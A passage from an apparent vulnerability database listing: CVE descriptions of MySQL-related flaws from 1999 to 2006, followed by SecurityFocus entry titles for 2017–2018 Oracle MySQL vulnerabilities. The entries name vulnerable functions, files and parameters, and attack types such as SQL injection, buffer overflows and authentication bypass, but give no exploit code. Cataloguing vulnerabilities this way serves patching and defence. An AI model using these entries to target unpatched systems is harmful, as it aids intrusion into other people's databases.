20608| [CVE-2006-2750] Cross-site scripting (XSS) vulnerability in the do_mysql_query function in core.php for Open Searchable Image Catalogue (OSIC) before 0.7.0.1 allows remote attackers to inject arbitrary web scripts or HTML via failed SQL queries, which is reflected in an error message.
20609| [CVE-2006-2748] SQL injection vulnerability in the do_mysql_query function in core.php for Open Searchable Image Catalogue (OSIC) before 0.7.0.1 allows remote attackers to inject arbitrary SQL commands via multiple vectors, as demonstrated by the (1) type parameter in adminfunctions.php and the (2) catalogue_id parameter in editcatalogue.php.
20610| [CVE-2006-2742] SQL injection vulnerability in Drupal 4.6.x before 4.6.7 and 4.7.0 allows remote attackers to execute arbitrary SQL commands via the (1) count and (2) from variables to (a) database.mysql.inc, (b) database.pgsql.inc, and (c) database.mysqli.inc.
20611| [CVE-2006-2543] Xtreme Topsites 1.1 allows remote attackers to trigger MySQL errors and possibly conduct SQL injection attacks via unspecified vectors in join.php.
20612| [CVE-2006-2329] AngelineCMS 0.6.5 and earlier allow remote attackers to obtain sensitive information via a direct request for (1) adodb-access.inc.php, (2) adodb-ado.inc.php, (3) adodb-ado_access.inc, (4) adodb-ado_mssql.inc.php, (5) adodb-borland_ibase, (6) adodb-csv.inc.php, (7) adodb-db2.inc.php, (8) adodb-fbsql.inc.php, (9) adodb-firebird.inc.php, (10) adodb-ibase.inc.php, (11) adodb-informix.inc.php, (12) adodb-informix72.inc, (13) adodb-mssql.inc.php, (14) adodb-mssqlpo.inc.php, (15) adodb-mysql.inc.php, (16) adodb-mysqlt.inc.php, (17) adodb-oci8.inc.php, (18) adodb-oci805.inc.php, (19) adodb-oci8po.inc.php, and (20) adodb-odbc.inc.php, which reveal the path in various error messages
20613| [CVE-2006-2042] Adobe Dreamweaver 8 before 8.0.2 and MX 2004 can generate code that allows SQL injection attacks in the (1) ColdFusion, (2) PHP mySQL, (3) ASP, (4) ASP.NET, and (5) JSP server models.
20614| [CVE-2006-1930] ** DISPUTED ** Multiple SQL injection vulnerabilities in userscript.php in Green Minute 1.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) huserid, (2) pituus, or (3) date parameters. NOTE: this issue has been disputed by the vendor, saying "those parameters mentioned ARE checked (preg_match) before they are used in SQL-query... If someone decided to add SQL-injection stuff to certain parameter, they would see an error text, but only because _nothing_ was passed inside that parameter (to MySQL-database)." As allowed by the vendor, CVE investigated this report on 20060525 and found that the demo site demonstrated a non-sensitive SQL error when given standard SQL injection manipulations.
20615| [CVE-2006-1518] Buffer overflow in the open_table function in sql_base.cc in MySQL 5.0.x up to 5.0.20 might allow remote attackers to execute arbitrary code via crafted COM_TABLE_DUMP packets with invalid length values.
20616| [CVE-2006-1517] sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to obtain sensitive information via a COM_TABLE_DUMP request with an incorrect packet length, which includes portions of memory in an error message.
20617| [CVE-2006-1516] The check_connection function in sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to read portions of memory via a username without a trailing null byte, which causes a buffer over-read.
20618| [CVE-2006-1451] MySQL Manager in Apple Mac OS X 10.3.9 and 10.4.6, when setting up a new MySQL database server, does not use the "New MySQL root password" that is provided, which causes the MySQL root password to be blank and allows local users to gain full privileges to that database.
20619| [CVE-2006-1396] Multiple cross-site scripting (XSS) vulnerabilities in Cholod MySQL Based Message Board allow remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: the provenance of this information is unknown
20620| [CVE-2006-1395] SQL injection vulnerability in mb.cgi in Cholod MySQL Based Message Board allows remote attackers to execute arbitrary SQL commands via unspecified vectors in a showmessage action, possibly the username parameter. NOTE: the provenance of this information is unknown
20621| [CVE-2006-1324] Cross-site scripting (XSS) vulnerability in acp/lib/class_db_mysql.php in Woltlab Burning Board (wBB) 2.3.4 allows remote attackers to inject arbitrary web script or HTML via the errormsg parameter when a SQL error is generated.
20622| [CVE-2006-1211] IBM Tivoli Micromuse Netcool/NeuSecure 3.0.236 configures a MySQL database to allow connections from any source IP address with the ns database account, which allows remote attackers to bypass the Netcool/NeuSecure application layer and perform unauthorized database actions. NOTE: IBM has privately confirmed to CVE that a fix is available for these issues.
20623| [CVE-2006-1210] The web interface for IBM Tivoli Micromuse Netcool/NeuSecure 3.0.236 includes the MySQL database username and password in cleartext in body.phtml, which allows remote attackers to gain privileges by reading the source. NOTE: IBM has privately confirmed to CVE that a fix is available for these issues.
20624| [CVE-2006-1112] Aztek Forum 4.0 allows remote attackers to obtain sensitive information via a long login value in a register form, which displays the installation path in a MySQL error message.
20625| [CVE-2006-1111] Aztek Forum 4.0 allows remote attackers to obtain sensitive information via a "*/*" in the msg parameter to index.php, which reveals usernames and passwords in a MySQL error message, possibly due to a forced SQL error or SQL injection.
20626| [CVE-2006-0909] Invision Power Board (IPB) 2.1.4 and earlier allows remote attackers to view sensitive information via a direct request to multiple PHP scripts that include the full path in error messages, including (1) PEAR/Text/Diff/Renderer/inline.php, (2) PEAR/Text/Diff/Renderer/unified.php, (3) PEAR/Text/Diff3.php, (4) class_db.php, (5) class_db_mysql.php, and (6) class_xml.php in the ips_kernel/ directory
20627| [CVE-2006-0903] MySQL 5.0.18 and earlier allows local users to bypass logging mechanisms via SQL queries that contain the NULL character, which are not properly handled by the mysql_real_query function. NOTE: this issue was originally reported for the mysql_query function, but the vendor states that since mysql_query expects a null character, this is not an issue for mysql_query.
20628| [CVE-2006-0692] Multiple SQL injection vulnerabilities in Carey Briggs PHP/MYSQL Timesheet 1 and 2 allow remote attackers to execute arbitrary SQL commands via the (1) yr, (2) month, (3) day, and (4) job parameters in (a) index.php and (b) changehrs.php.
20629| [CVE-2006-0369] ** DISPUTED ** MySQL 5.0.18 allows local users with access to a VIEW to obtain sensitive information via the "SELECT * FROM information_schema.views
20630| [CVE-2006-0200] Format string vulnerability in the error-reporting feature in the mysqli extension in PHP 5.1.0 and 5.1.1 might allow remote attackers to execute arbitrary code via format string specifiers in MySQL error messages.
20631| [CVE-2006-0146] The server.php test script in ADOdb for PHP before 4.70, as used in multiple products including (1) Mantis, (2) PostNuke, (3) Moodle, (4) Cacti, (5) Xaraya, (6) PHPOpenChat, (7) MAXdev MD-Pro, and (8) MediaBeez, when the MySQL root password is empty, allows remote attackers to execute arbitrary SQL commands via the sql parameter.
20632| [CVE-2006-0097] Stack-based buffer overflow in the create_named_pipe function in libmysql.c in PHP 4.3.10 and 4.4.x before 4.4.3 for Windows allows attackers to execute arbitrary code via a long (1) arg_host or (2) arg_unix_socket argument, as demonstrated by a long named pipe variable in the host argument to the mysql_connect function.
20633| [CVE-2006-0056] Double free vulnerability in the authentication and authentication token alteration code in PAM-MySQL 0.6.x before 0.6.2 and 0.7.x before 0.7pre3 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted passwords, which lead to a double free of a pointer that was created by the pam_get_item function. NOTE: this issue only occurs in certain configurations in which there are multiple PAM modules, PAM-MySQL is not evaluated first, and there are no requisite modules before PAM-MySQL.
20634| [CVE-2005-4713] Unspecified vulnerability in the SQL logging facility in PAM-MySQL 0.6.x before 0.6.2 and 0.7.x before 0.7pre3 allows remote attackers to cause a denial of service (segmentation fault) via unspecified vectors, probably involving the pam_mysql_sql_log function when being used in vsftpd, which does not include the IP address argument to an sprintf call.
20635| [CVE-2005-4661] The notifyendsubs cron job in Campsite before 2.3.3 sends an e-mail message containing a certain unencrypted MySQL password, which allows remote attackers to sniff the password.
20636| [CVE-2005-4626] The default configuration of Recruitment Software installs admin/site.xml under the web document root with insufficient access control, which might allow remote attackers to obtain sensitive information (MySQL database credentials) via a direct request.
20637| [CVE-2005-4237] Cross-site scripting (XSS) vulnerability in MySQL Auction 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search module parameters, possibly the keyword parameter in the SearchZoom module.
20638| [CVE-2005-2865] Multiple PHP remote file inclusion vulnerabilities in aMember Pro 2.3.4 allow remote attackers to execute arbitrary PHP code via the config[root_dir] parameter to (1) mysql.inc.php, (2) efsnet.inc.php, (3) theinternetcommerce.inc.php, (4) cdg.inc.php, (5) compuworld.inc.php, (6) directone.inc.php, (7) authorize_aim.inc.php, (8) beanstream.inc.php, (9) config.inc.php, (10) eprocessingnetwork.inc.php, (11) eway.inc.php, (12) linkpoint.inc.php, (13) logiccommerce.inc.php, (14) netbilling.inc.php, (15) payflow_pro.inc.php, (16) paymentsgateway.inc.php, (17) payos.inc.php, (18) payready.inc.php, or (19) plugnplay.inc.php.
20639| [CVE-2005-2573] The mysql_create_function function in sql_udf.cc for MySQL 4.0 before 4.0.25, 4.1 before 4.1.13, and 5.0 before 5.0.7-beta, when running on Windows, uses an incomplete blacklist in a directory traversal check, which allows attackers to include arbitrary files via the backslash (\) character.
20640| [CVE-2005-2572] MySQL, when running on Windows, allows remote authenticated users with insert privileges on the mysql.func table to cause a denial of service (server hang) and possibly execute arbitrary code via (1) a request for a non-library file, which causes the Windows LoadLibraryEx function to block, or (2) a request for a function in a library that has the XXX_deinit or XXX_init functions defined but is not tailored for mySQL, such as jpeg1x32.dll and jpeg2x32.dll.
20641| [CVE-2005-2571] FunkBoard 0.66CF, and possibly earlier versions, does not properly restrict access to the (1) admin/mysql_install.php and (2) admin/pg_install.php scripts, which allows attackers to obtain the database username and password or inject arbitrary PHP code into info.php.
20642| [CVE-2005-2558] Stack-based buffer overflow in the init_syms function in MySQL 4.0 before 4.0.25, 4.1 before 4.1.13, and 5.0 before 5.0.7-beta allows remote authenticated users who can create user-defined functions to execute arbitrary code via a long function_name field.
20643| [CVE-2005-2468] Multiple SQL injection vulnerabilities in MySQL Eventum 1.5.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) isCorrectPassword or (2) userExist function in class.auth.php, getCustomFieldReport function in (4) custom_fields.php, (5) custom_fields_graph.php, or (6) class.report.php, or the insert function in (7) releases.php or (8) class.release.php.
20644| [CVE-2005-2467] Multiple cross-site scripting (XSS) vulnerabilities in MySQL Eventum 1.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to view.php, (2) release parameter to list.php, or (3) F parameter to get_jsrs_data.php.
20645| [CVE-2005-2174] Bugzilla 2.17.x, 2.18 before 2.18.2, 2.19.x, and 2.20 before 2.20rc1 inserts a bug into the database before it is marked private, which introduces a race condition and allows attackers to access information about the bug via buglist.cgi before MySQL replication is complete.
20646| [CVE-2005-1944] xmysqladmin 1.0 and earlier allows local users to delete arbitrary files via a symlink attack on a database backup file in /tmp.
20647| [CVE-2005-1636] mysql_install_db in MySQL 4.1.x before 4.1.12 and 5.x up to 5.0.4 creates the mysql_install_db.X file with a predictable filename and insecure permissions, which allows local users to execute arbitrary SQL commands by modifying the file's contents.
20648| [CVE-2005-1274] Stack-based buffer overflow in the getIfHeader function in the WebDAV functionality in MySQL MaxDB before 7.5.00.26 allows remote attackers to execute arbitrary code via an HTTP unlock request and a long "If" parameter.
20649| [CVE-2005-1121] Format string vulnerability in the my_xlog function in lib.c for Oops! Proxy Server 1.5.23 and earlier, as called by the auth functions in the passwd_mysql and passwd_pgsql modules, may allow attackers to execute arbitrary code via a URL.
20650| [CVE-2005-0799] MySQL 4.1.9, and possibly earlier versions, allows remote attackers with certain privileges to cause a denial of service (application crash) via a use command followed by an MS-DOS device name such as (1) LPT1 or (2) PRN.
20651| [CVE-2005-0711] MySQL 4.0.23 and earlier, and 4.1.x up to 4.1.10, uses predictable file names when creating temporary tables, which allows local users with CREATE TEMPORARY TABLE privileges to overwrite arbitrary files via a symlink attack.
20652| [CVE-2005-0710] MySQL 4.0.23 and earlier, and 4.1.x up to 4.1.10, allows remote authenticated users with INSERT and DELETE privileges to bypass library path restrictions and execute arbitrary libraries by using INSERT INTO to modify the mysql.func table, which is processed by the udf_init function.
20653| [CVE-2005-0709] MySQL 4.0.23 and earlier, and 4.1.x up to 4.1.10, allows remote authenticated users with INSERT and DELETE privileges to execute arbitrary code by using CREATE FUNCTION to access libc calls, as demonstrated by using strcat, on_exit, and exit.
20654| [CVE-2005-0684] Multiple buffer overflows in the web tool for MySQL MaxDB before 7.5.00.26 allows remote attackers to execute arbitrary code via (1) an HTTP GET request with a long file parameter after a percent ("%") sign or (2) a long Lock-Token string to the WebDAV functionality, which is not properly handled by the getLockTokenHeader function in WDVHandler_CommonUtils.c.
20655| [CVE-2005-0646] SQL injection vulnerability in auth.php in paNews 2.0.4b allows remote attackers to execute arbitrary SQL via the mysql_prefix parameter.
20656| [CVE-2005-0544] phpMyAdmin 2.6.1 allows remote attackers to obtain the full path of the server via direct requests to (1) sqlvalidator.lib.php, (2) sqlparser.lib.php, (3) select_theme.lib.php, (4) select_lang.lib.php, (5) relation_cleanup.lib.php, (6) header_meta_style.inc.php, (7) get_foreign.lib.php, (8) display_tbl_links.lib.php, (9) display_export.lib.php, (10) db_table_exists.lib.php, (11) charset_conversion.lib.php, (12) ufpdf.php, (13) mysqli.dbi.lib.php, (14) setup.php, or (15) cookie.auth.lib.php, which reveals the path in a PHP error message.
20657| [CVE-2005-0111] Stack-based buffer overflow in the websql CGI program in MySQL MaxDB 7.5.00 allows remote attackers to execute arbitrary code via a long password parameter.
20658| [CVE-2005-0083] MySQL MaxDB 7.5.00 for Windows, and possibly earlier versions and other platforms, allows remote attackers to cause a denial of service (application crash) via invalid parameters to the (1) DBMCli_String::ReallocString, (2) DBMCli_String::operator, (3) DBMCli_Buffer::ForceResize, (4) DBMCli_Wizard::InstallDatabase, (5) DBMCli_Devspaces::Complete, (6) DBMWeb_TemplateWizard::askForWriteCountStep5, or (7) DBMWeb_DBMWeb::wizardDB functions, which triggers a null dereference.
20659| [CVE-2005-0082] The sapdbwa_GetUserData function in MySQL MaxDB 7.5.0.0, and other versions before 7.5.0.21, allows remote attackers to cause a denial of service (crash) via invalid parameters to the WebDAV handler code, which triggers a null dereference that causes the SAP DB Web Agent to crash.
20660| [CVE-2005-0081] MySQL MaxDB 7.5.0.0, and other versions before 7.5.0.21, allows remote attackers to cause a denial of service (crash) via an HTTP request with invalid headers.
20661| [CVE-2005-0004] The mysqlaccess script in MySQL 4.0.23 and earlier, 4.1.x before 4.1.10, 5.0.x before 5.0.3, and other versions including 3.x, allows local users to overwrite arbitrary files or read temporary files via a symlink attack on temporary files.
20662| [CVE-2004-2632] phpMyAdmin 2.5.1 up to 2.5.7 allows remote attackers to modify configuration settings and gain unauthorized access to MySQL servers via modified $cfg['Servers'] variables.
20663| [CVE-2004-2398] Netenberg Fantastico De Luxe 2.8 uses database file names that contain the associated usernames, which allows local users to determine valid usernames and conduct brute force attacks by reading the file names from /var/lib/mysql, which is assigned world-readable permissions by cPanel 9.3.0 R5.
20664| [CVE-2004-2357] The embedded MySQL 4.0 server for Proofpoint Protection Server does not require a password for the root user of MySQL, which allows remote attackers to read or modify the backend database.
20665| [CVE-2004-2354] SQL injection vulnerability in 4nGuestbook 0.92 for PHP-Nuke 6.5 through 6.9 allows remote attackers to modify SQL statements via the entry parameter to modules.php, which can also facilitate cross-site scripting (XSS) attacks when MySQL errors are triggered.
20666| [CVE-2004-2149] Buffer overflow in the prepared statements API in libmysqlclient for MySQL 4.1.3 beta and 4.1.4 allows remote attackers to cause a denial of service via a large number of placeholders.
20667| [CVE-2004-2138] Cross-site scripting (XSS) vulnerability in AWSguest.php in AllWebScripts MySQLGuest allows remote attackers to inject arbitrary HTML and PHP code via the (1) Name, (2) Email, (3) Homepage or (4) Comments field.
20668| [CVE-2004-1228] The install scripts in SugarCRM Sugar Sales 2.0.1c and earlier are not removed after installation, which allows attackers to obtain the MySQL administrative password in cleartext from an installation form, or to cause a denial of service by changing database settings to the default.
20669| [CVE-2004-0957] Unknown vulnerability in MySQL 3.23.58 and earlier, when a local user has privileges for a database whose name includes a "_" (underscore), grants privileges to other databases that have similar names, which can allow the user to conduct unauthorized activities.
20670| [CVE-2004-0956] MySQL before 4.0.20 allows remote attackers to cause a denial of service (application crash) via a MATCH AGAINST query with an opening double quote but no closing double quote.
20671| [CVE-2004-0931] MySQL MaxDB before 7.5.00.18 allows remote attackers to cause a denial of service (crash) via an HTTP request to webdbm with high ASCII values in the Server field, which triggers an assert error in the IsAscii7 function.
20672| [CVE-2004-0837] MySQL 4.x before 4.0.21, and 3.x before 3.23.49, allows attackers to cause a denial of service (crash or hang) via multiple threads that simultaneously alter MERGE table UNIONs.
20673| [CVE-2004-0836] Buffer overflow in the mysql_real_connect function in MySQL 4.x before 4.0.21, and 3.x before 3.23.49, allows remote DNS servers to cause a denial of service and possibly execute arbitrary code via a DNS response with a large address length (h_length).
20674| [CVE-2004-0835] MySQL 3.x before 3.23.59, 4.x before 4.0.19, 4.1.x before 4.1.2, and 5.x before 5.0.1, checks the CREATE/INSERT rights of the original table instead of the target table in an ALTER TABLE RENAME operation, which could allow attackers to conduct unauthorized activities.
20675| [CVE-2004-0628] Stack-based buffer overflow in MySQL 4.1.x before 4.1.3, and 5.0, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long scramble string.
20676| [CVE-2004-0627] The check_scramble_323 function in MySQL 4.1.x before 4.1.3, and 5.0, allows remote attackers to bypass authentication via a zero-length scrambled string.
20677| [CVE-2004-0457] The mysqlhotcopy script in mysql 4.0.20 and earlier, when using the scp method from the mysql-server package, allows local users to overwrite arbitrary files via a symlink attack on temporary files.
20678| [CVE-2004-0388] The mysqld_multi script in MySQL allows local users to overwrite arbitrary files via a symlink attack.
20679| [CVE-2004-0381] mysqlbug in MySQL allows local users to overwrite arbitrary files via a symlink attack on the failed-mysql-bugreport temporary file.
20680| [CVE-2003-1480] MySQL 3.20 through 4.1.0 uses a weak algorithm for hashed passwords, which makes it easier for attackers to decrypt the password via brute force methods.
20681| [CVE-2003-1421] Unspecified vulnerability in mod_mysql_logger shared object in SuckBot 0.006 allows remote attackers to cause a denial of service (seg fault) via unknown attack vectors.
20682| [CVE-2003-1383] WEB-ERP 0.1.4 and earlier allows remote attackers to obtain sensitive information via an HTTP request for the logicworks.ini file, which contains the MySQL database username and password.
20683| [CVE-2003-1331] Stack-based buffer overflow in the mysql_real_connect function in the MySql client library (libmysqlclient) 4.0.13 and earlier allows local users to execute arbitrary code via a long socket name, a different vulnerability than CVE-2001-1453.
20684| [CVE-2003-0780] Buffer overflow in get_salt_from_password from sql_acl.cc for MySQL 4.0.14 and earlier, and 3.23.x, allows attackers with ALTER TABLE privileges to execute arbitrary code via a long Password field.
20685| [CVE-2003-0515] SQL injection vulnerabilities in the (1) PostgreSQL or (2) MySQL authentication modules for teapop 0.3.5 and earlier allow attackers to execute arbitrary SQL and possibly gain privileges.
20686| [CVE-2003-0150] MySQL 3.23.55 and earlier creates world-writeable files and allows mysql users to gain root privileges by using the "SELECT * INFO OUTFILE" operator to overwrite a configuration file and cause mysql to run as root upon restart, as demonstrated by modifying my.cnf.
20687| [CVE-2003-0073] Double-free vulnerability in mysqld for MySQL before 3.23.55 allows attackers with MySQL access to cause a denial of service (crash) via mysql_change_user.
20688| [CVE-2002-2043] SQL injection vulnerability in the LDAP and MySQL authentication patch for Cyrus SASL 1.5.24 and 1.5.27 allows remote attackers to execute arbitrary SQL commands and log in as arbitrary POP mail users via the password.
20689| [CVE-2002-1952] phpRank 1.8 does not properly check the return codes for MySQL operations when authenticating users, which could allow remote attackers to authenticate using a NULL password when database errors occur or if the database is unavailable.
20690| [CVE-2002-1923] The default configuration in MySQL 3.20.32 through 3.23.52, when running on Windows, does not have logging enabled, which could allow remote attackers to conduct activities without detection.
20691| [CVE-2002-1921] The default configuration of MySQL 3.20.32 through 3.23.52, when running on Windows, does set the bind address to the loopback interface, which allows remote attackers to connect to the database.
20692| [CVE-2002-1809] The default configuration of the Windows binary release of MySQL 3.23.2 through 3.23.52 has a NULL root password, which could allow remote attackers to gain unauthorized root access to the MySQL database.
20693| [CVE-2002-1479] Cacti before 0.6.8 stores a MySQL username and password in plaintext in config.php, which has world-readable permissions, which allows local users modify databases as the Cacti user and possibly gain privileges.
20694| [CVE-2002-1376] libmysqlclient client library in MySQL 3.x to 3.23.54, and 4.x to 4.0.6, does not properly verify length fields for certain responses in the (1) read_rows or (2) read_one_row routines, which allows remote attackers to cause a denial of service and possibly execute arbitrary code.
20695| [CVE-2002-1375] The COM_CHANGE_USER command in MySQL 3.x before 3.23.54, and 4.x to 4.0.6, allows remote attackers to execute arbitrary code via a long response.
20696| [CVE-2002-1374] The COM_CHANGE_USER command in MySQL 3.x before 3.23.54, and 4.x before 4.0.6, allows remote attackers to gain privileges via a brute force attack using a one-character password, which causes MySQL to only compare the provided password against the first character of the real password.
20697| [CVE-2002-1373] Signed integer vulnerability in the COM_TABLE_DUMP package for MySQL 3.23.x before 3.23.54 allows remote attackers to cause a denial of service (crash or hang) in mysqld by causing large negative integers to be provided to a memcpy call.
20698| [CVE-2002-0969] Buffer overflow in MySQL daemon (mysqld) before 3.23.50, and 4.0 beta before 4.02, on the Win32 platform, allows local users to execute arbitrary code via a long "datadir" parameter in the my.ini initialization file, whose permissions on Windows allow Full Control to the Everyone group.
20699| [CVE-2002-0229] Safe Mode feature (safe_mode) in PHP 3.0 through 4.1.0 allows attackers with access to the MySQL database to bypass Safe Mode access restrictions and read arbitrary files using "LOAD DATA INFILE LOCAL" SQL statements.
20700| [CVE-2001-1454] Buffer overflow in MySQL before 3.23.33 allows remote attackers to execute arbitrary code via a long drop database request.
20701| [CVE-2001-1453] Buffer overflow in libmysqlclient.so in MySQL 3.23.33 and earlier allows remote attackers to execute arbitrary code via a long host parameter.
20702| [CVE-2001-1275] MySQL before 3.23.31 allows users with a MySQL account to use the SHOW GRANTS command to obtain the encrypted administrator password from the mysql.user table and possibly gain privileges via password cracking.
20703| [CVE-2001-1274] Buffer overflow in MySQL before 3.23.31 allows attackers to cause a denial of service and possibly gain privileges.
20704| [CVE-2001-1255] WinMySQLadmin 1.1 stores the MySQL password in plain text in the my.ini file, which allows local users to obtain unathorized access the MySQL database.
20705| [CVE-2001-1226] AdCycle 1.17 and earlier allow remote attackers to modify SQL queries, which are not properly sanitized before being passed to the MySQL database.
20706| [CVE-2001-1044] Basilix Webmail 0.9.7beta, and possibly other versions, stores *.class and *.inc files under the document root and does not restrict access, which could allows remote attackers to obtain sensitive information such as MySQL passwords and usernames from the mysql.class file.
20707| [CVE-2001-0990] Inter7 vpopmail 4.10.35 and earlier, when using the MySQL module, compiles authentication information in cleartext into the libvpopmail.a library, which allows local users to obtain the MySQL username and password by inspecting the vpopmail programs that use the library.
20708| [CVE-2001-0645] Symantec/AXENT NetProwler 3.5.x contains several default passwords, which could allow remote attackers to (1) access to the management tier via the "admin" password, or (2) connect to a MySQL ODBC from the management tier using a blank password.
20709| [CVE-2001-0407] Directory traversal vulnerability in MySQL before 3.23.36 allows local users to modify arbitrary files and gain privileges by creating a database whose name starts with .. (dot dot).
20710| [CVE-2000-0981] MySQL Database Engine uses a weak authentication method which leaks information that could be used by a remote attacker to recover the password.
20711| [CVE-2000-0957] The pluggable authentication module for mysql (pam_mysql) before 0.4.7 does not properly cleanse user input when constructing SQL statements, which allows attackers to obtain plaintext passwords or hashes.
20712| [CVE-2000-0707] PCCS MySQLDatabase Admin Tool Manager 1.2.4 and earlier installs the file dbconnect.inc within the web root, which allows remote attackers to obtain sensitive information such as the administrative password.
20713| [CVE-2000-0148] MySQL 3.22 allows remote attackers to bypass password authentication and access a database via a short check string.
20714| [CVE-2000-0045] MySQL allows local users to modify passwords for arbitrary MySQL users via the GRANT privilege.
20715| [CVE-1999-1188] mysqld in MySQL 3.21 creates log files with world-readable permissions, which allows local users to obtain passwords for users who are added to the user database.
20716|
20717| SecurityFocus - https://www.securityfocus.com/bid/:
20718| [104370] MySQL Multi-Master Replication Manager Multiple Remote Command Injection Vulnerabilities
20719| [103954] Oracle MySQL CVE-2018-2767 Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
20720| [103876] Oracle MySQL Server CVE-2018-2769 Remote Security Vulnerability
20721| [103845] Oracle MySQL Server CVE-2018-2839 Remote Security Vulnerability
20722| [103838] Oracle MySQL Cluster CVE-2018-2877 Local Security Vulnerability
20723| [103836] Oracle MySQL Server CVE-2018-2812 Remote Security Vulnerability
20724| [103831] Oracle MySQL Server CVE-2018-2805 Remote Security Vulnerability
20725| [103830] Oracle MySQL Server CVE-2018-2813 Remote Security Vulnerability
20726| [103828] Oracle MySQL Server CVE-2018-2771 Remote Security Vulnerability
20727| [103825] Oracle MySQL Server CVE-2018-2781 Remote Security Vulnerability
20728| [103824] Oracle MySQL Server CVE-2018-2818 Remote Security Vulnerability
20729| [103820] Oracle MySQL Server CVE-2018-2761 Remote Security Vulnerability
20730| [103818] Oracle MySQL Server CVE-2018-2817 Remote Security Vulnerability
20731| [103814] Oracle MySQL Server CVE-2018-2819 Remote Security Vulnerability
20732| [103811] Oracle MySQL Server CVE-2018-2773 Local Security Vulnerability
20733| [103807] Oracle MySQL Server CVE-2018-2755 Local Security Vulnerability
20734| [103805] Oracle MySQL Server CVE-2018-2766 Remote Security Vulnerability
20735| [103804] Oracle MySQL Server CVE-2018-2787 Remote Security Vulnerability
20736| [103802] Oracle MySQL Server CVE-2018-2758 Remote Security Vulnerability
20737| [103801] Oracle MySQL Server CVE-2018-2784 Remote Security Vulnerability
20738| [103799] Oracle MySQL Server CVE-2018-2782 Remote Security Vulnerability
20739| [103794] Oracle MySQL Server CVE-2018-2762 Remote Security Vulnerability
20740| [103791] Oracle MySQL Server CVE-2018-2776 Remote Security Vulnerability
20741| [103790] Oracle MySQL Server CVE-2018-2846 Remote Security Vulnerability
20742| [103789] Oracle MySQL Server CVE-2018-2816 Remote Security Vulnerability
20743| [103787] Oracle MySQL Server CVE-2018-2779 Remote Security Vulnerability
20744| [103785] Oracle MySQL Server CVE-2018-2778 Remote Security Vulnerability
20745| [103783] Oracle MySQL Server CVE-2018-2810 Remote Security Vulnerability
20746| [103781] Oracle MySQL Server CVE-2018-2777 Remote Security Vulnerability
20747| [103780] Oracle MySQL Server CVE-2018-2759 Remote Security Vulnerability
20748| [103779] Oracle MySQL Server CVE-2018-2786 Remote Security Vulnerability
20749| [103778] Oracle MySQL Server CVE-2018-2780 Remote Security Vulnerability
20750| [103777] Oracle MySQL Server CVE-2018-2775 Remote Security Vulnerability
20751| [102714] Oracle MySQL Server CVE-2018-2591 Remote Security Vulnerability
20752| [102713] Oracle MySQL Server CVE-2018-2562 Remote Security Vulnerability
20753| [102712] Oracle MySQL Server CVE-2018-2565 Remote Security Vulnerability
20754| [102711] Oracle MySQL Server CVE-2018-2647 Remote Security Vulnerability
20755| [102710] Oracle MySQL Server CVE-2018-2573 Remote Security Vulnerability
20756| [102709] Oracle MySQL Server CVE-2018-2612 Remote Security Vulnerability
20757| [102708] Oracle MySQL Server CVE-2018-2583 Remote Security Vulnerability
20758| [102706] Oracle MySQL Server CVE-2018-2622 Remote Security Vulnerability
20759| [102704] Oracle MySQL Server CVE-2018-2703 Remote Security Vulnerability
20760| [102703] Oracle MySQL Server CVE-2018-2646 Remote Security Vulnerability
20761| [102701] Oracle MySQL Server CVE-2018-2696 Remote Security Vulnerability
20762| [102700] Oracle MySQL Server CVE-2018-2586 Remote Security Vulnerability
20763| [102698] Oracle MySQL Server CVE-2018-2645 Remote Security Vulnerability
20764| [102697] Oracle MySQL Server CVE-2018-2590 Remote Security Vulnerability
20765| [102696] Oracle MySQL Server CVE-2018-2600 Remote Security Vulnerability
20766| [102695] Oracle MySQL Server CVE-2018-2576 Remote Security Vulnerability
20767| [102685] Oracle MySQL Server CVE-2018-2667 Remote Security Vulnerability
20768| [102682] Oracle MySQL Server CVE-2018-2668 Remote Security Vulnerability
20769| [102681] Oracle MySQL Server CVE-2018-2665 Remote Security Vulnerability
20770| [102678] Oracle MySQL Server CVE-2018-2640 Remote Security Vulnerability
20771| [102674] Oracle MySQL Connectors CVE-2018-2585 Remote Security Vulnerability
20772| [101448] Oracle MySQL Server CVE-2017-10313 Remote Security Vulnerability
20773| [101446] Oracle MySQL Server CVE-2017-10311 Remote Security Vulnerability
20774| [101444] Oracle MySQL Server CVE-2017-10294 Remote Security Vulnerability
20775| [101441] Oracle MySQL Server CVE-2017-10276 Remote Security Vulnerability
20776| [101439] Oracle MySQL Connectors CVE-2017-10277 Remote Security Vulnerability
20777| [101433] Oracle MySQL Server CVE-2017-10167 Remote Security Vulnerability
20778| [101429] Oracle MySQL Server CVE-2017-10365 Remote Security Vulnerability
20779| [101424] Oracle MySQL Server CVE-2017-10165 Remote Security Vulnerability
20780| [101420] Oracle MySQL Server CVE-2017-10283 Remote Security Vulnerability
20781| [101415] Oracle MySQL Server CVE-2017-10379 Remote Security Vulnerability
20782| [101410] Oracle MySQL Server CVE-2017-10320 Remote Security Vulnerability
20783| [101406] Oracle MySQL Server CVE-2017-10384 Remote Security Vulnerability
20784| [101402] Oracle MySQL Server CVE-2017-10155 Remote Security Vulnerability
20785| [101397] Oracle MySQL Server CVE-2017-10286 Remote Security Vulnerability
20786| [101390] Oracle MySQL Server CVE-2017-10268 Local Security Vulnerability
20787| [101385] Oracle MySQL Server CVE-2017-10284 Remote Security Vulnerability
20788| [101381] Oracle MySQL Enterprise Monitor CVE-2017-10424 Remote Security Vulnerability
20789| [101375] Oracle MySQL Server CVE-2017-10378 Remote Security Vulnerability
20790| [101373] Oracle MySQL Server CVE-2017-10296 Remote Security Vulnerability
20791| [101337] Oracle MySQL Server CVE-2017-10227 Remote Security Vulnerability
20792| [101324] Oracle MySQL Connectors CVE-2017-10203 Remote Security Vulnerability
20793| [101316] Oracle MySQL Server CVE-2017-10279 Remote Security Vulnerability
